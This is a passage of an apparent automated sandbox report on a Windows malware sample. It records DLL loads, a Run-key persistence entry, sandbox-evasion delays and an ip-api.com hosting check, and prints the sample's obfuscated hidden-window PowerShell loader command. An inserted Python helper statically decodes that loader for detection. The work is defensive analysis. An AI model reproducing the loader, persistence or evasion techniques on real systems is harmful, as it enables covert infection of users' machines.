            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

            Data Obfuscation

            Source: Yara match  File source: 0000000F.00000002.2205196768.000000000F541000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 00000001.00000002.1641973533.000000000E71D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"  (4 identical entries)
            Source: C:\Users\user\Desktop\file.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content 'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"  (4 identical entries)
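The PowerShell command line recorded above never names the cmdlet it runs: it reads a file into a variable, slices three characters out of that variable at a fixed offset, and dot-invokes the slice with the whole file content as the argument. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample. The two command lines are copied from the report; the Mezuzot.epo file itself is not on this page, so the script builds a constructed stand-in and assumes the three characters at offset 60455 spell IEX (that token is an assumption, not something the report shows). The cmd.exe line is decoded the way cmd's own parser would, by collapsing the doubled caret.

```python
"""Static triage of the 'read file, slice a cmdlet name, dot-invoke it' PowerShell pattern.

Added example, not code from the report. Command lines are copied from the report;
the .epo payload is not on the page and is replaced by a labelled, constructed stand-in.
"""
import re
from typing import Optional

# Copied from the report's "Process created" entries.
CMD_LINE = r'"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"'
PS_LINE = (
    r'"powershell.exe" -windowstyle hidden "$Skovridergaards=Get-Content '
    r"'C:\Users\user\AppData\Roaming\Pitapats\gimmickry\Passiveness\Kdbjergenes\Hlidhskjalf\Mezuzot.epo';"
    r"$Articulations=$Skovridergaards.SubString(60455,3);.$Articulations($Skovridergaards)"
    r'"'
)

# $var = Get-Content '<path>'
_GET_CONTENT = re.compile(r"\$(\w+)\s*=\s*Get-Content\s+'([^']+)'", re.IGNORECASE)
# $tok = $var.SubString(<offset>,<length>)
_SUBSTRING = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\.SubString\((\d+)\s*,\s*(\d+)\)", re.IGNORECASE)
# .$tok($var)   dot-sourcing whatever string $tok holds, with $var as its argument
_DOT_INVOKE = re.compile(r"\.\$(\w+)\(\$(\w+)\)")


def triage_powershell_loader(cmdline: str) -> Optional[dict]:
    """Return path/offset/length when the three stages chain together, else None.

    The chain is only interesting when the slice comes from the file content and the
    sliced token is what gets invoked on that same content; unrelated SubString or
    Get-Content calls do not match.
    """
    gc = _GET_CONTENT.search(cmdline)
    ss = _SUBSTRING.search(cmdline)
    inv = _DOT_INVOKE.search(cmdline)
    if not (gc and ss and inv):
        return None
    content_var, path = gc.groups()
    token_var, src_var, offset, length = ss.groups()
    invoked_var, arg_var = inv.groups()
    if not (src_var == content_var and invoked_var == token_var and arg_var == content_var):
        return None
    return {
        "path": path,
        "offset": int(offset),
        "length": int(length),
        "hidden_window": "-windowstyle hidden" in cmdline.lower(),
    }


def resolve_token(file_content: str, offset: int, length: int) -> str:
    """Apply the SubString call as PowerShell would (zero-based character offset), without executing anything."""
    if offset < 0 or offset + length > len(file_content):
        raise ValueError("SubString range lies outside the file content")
    return file_content[offset:offset + length]


def unescape_cmd_carets(arg: str) -> str:
    """cmd.exe consumes ^ as its escape character, so ^^ collapses to a single ^ before the command runs."""
    return re.sub(r"\^(.)", r"\1", arg)


def build_constructed_epo(token: str = "IEX", offset: int = 60455) -> str:
    """Constructed stand-in for Mezuzot.epo (the real file is not on this page).

    It is a single line padded so that the characters at `offset` spell `token`;
    the choice of IEX is an assumption about what such a slice resolves to.
    """
    return "#" * offset + token + "# remainder of the obfuscated script would follow"


if __name__ == "__main__":
    info = triage_powershell_loader(PS_LINE)
    print("loader pattern:", info)
    epo = build_constructed_epo()
    print("token at offset (constructed file):", resolve_token(epo, info["offset"], info["length"]))
    print("cmd argument after caret escaping:", unescape_cmd_carets('set /A 1^^0'))
```

Run against a recovered copy of the real file, `resolve_token` gives the three characters PowerShell would have dot-invoked, so the payload can be identified without detonating it; the regexes are also a usable starting point for a command-line detection on `SubString(` combined with `.$` invocation.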
            Source: C:\Windows\SysWOW64\reg.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Udbygningerne230  (2 identical entries)
            Source: C:\Users\user\Desktop\file.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX  (97 identical entries)
            Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\file.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX  (80 identical entries)
            Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe  Process information set: NOOPENFILEERRORBOX  (57 identical entries)
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Memory allocated: 3270000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Memory allocated: 24F70000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Memory allocated: 24D80000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Memory allocated: 2DB0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Memory allocated: 24960000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Memory allocated: 24800000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 599888
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 599776
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 599664
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 599554
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 599443
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 599332
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 599204
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 599076
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 598964
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 598852
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 598741
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 598630
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 598518
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 598391
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 598279
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 598167
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 598056
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 597945
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 597833
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 597715
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 597610
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 597482
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 597370
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 597258
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 597146
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 597034
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 596906
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 596794
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 596682
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 596571
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 596460
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 596348
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 596220
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 596093
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 595981
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 595870
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 595760
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 595647
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 595537
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 595425
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 595300
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 595173
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 595045
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 594933
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 594822
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 594711
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 594599
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 594471
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 594343
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2109
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7791
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3818
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6010
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Window / User API: threadDelayed 387
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe | Window / User API: threadDelayed 9707
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092 | Thread sleep count: 2109 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096 | Thread sleep count: 7791 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7144 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 6192 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108 | Thread sleep count: 3818 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108 | Thread sleep count: 6010 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7044 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780 | Thread sleep count: 387 > 30
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -599888s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -599776s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780 | Thread sleep count: 134 > 30
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -599664s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -599554s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -599443s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -599332s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -9223372036854770s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 4780 | Thread sleep count: 9707 > 30
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -599204s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -599076s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -598964s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -598852s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -598741s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -598630s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -598518s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -598391s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -598279s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -598167s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -598056s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -597945s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -597833s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -597715s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -597610s >= -30000s
            Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe TID: 6168 | Thread sleep time: -597482s >= -30000s
